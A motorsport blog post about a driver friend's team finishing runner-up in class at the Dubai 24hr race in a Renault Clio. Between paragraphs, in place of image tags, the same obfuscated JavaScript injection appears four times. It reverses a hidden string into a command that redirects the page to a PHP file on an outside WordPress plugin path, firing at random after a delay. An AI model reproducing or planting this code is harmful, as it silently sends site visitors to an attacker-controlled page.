I first met the Moutran Brothers just over fours ago at a UAE Desert Rally in Umm al Quwain and have been in touch and good friends ever since. We even ventured down the same route with our choice of Touring Cars to race in the UAE National Series and between us came up with the Duel Racing name to race under. However situations would change and we would never get to race in a team together….sadly!

However without digressing too far the Moutran Clan have now ventured very successfully into Endurance racing as they always promised themselves and with the skills and support of the NFSDXB.com crew they found themselves superbly worthy runners up in their class at the 2009 Dubai 24hrs.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Dubai%2024hrs%202010/Duel/duel1.jpg” alt=”” width=”728″ />

So now that all congratulations has died down and celebrations have settled it is time to reflect and look back on a hectic weekend at the Dubai Autodrome. The call as to what machine to use from their stable was quite an easy one, so up stepped the Renault Clio that had successfully taken them over the finish line in their first 24hr race in Barcelona.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Dubai%2024hrs%202010/Duel/duel131.jpg” alt=”” width=”728″ />

After a bit of a much needed face lift and some super skill love from Sacco and his team at Polimar…the driver list was chosen and the keys were thrown at the exceptional Salman Bin Rashed Al Khalifa to start from the flag.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Dubai%2024hrs%202010/Duel/duel17.jpg” alt=”” width=”728″ />

So, after starting 4th in class Sal Al Khalifa started the race and flexing his skill pushed the team straight up into first in class over the course of the opening two hours…you could say that things were looking good.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Dubai%2024hrs%202010/Duel/duel21-1.jpg” alt=”” width=”728″ />

He was followed by Nabil Moutran, a first timer at endurance racing, who proved to be up for the challenge with a swift and steady two hours in the car.
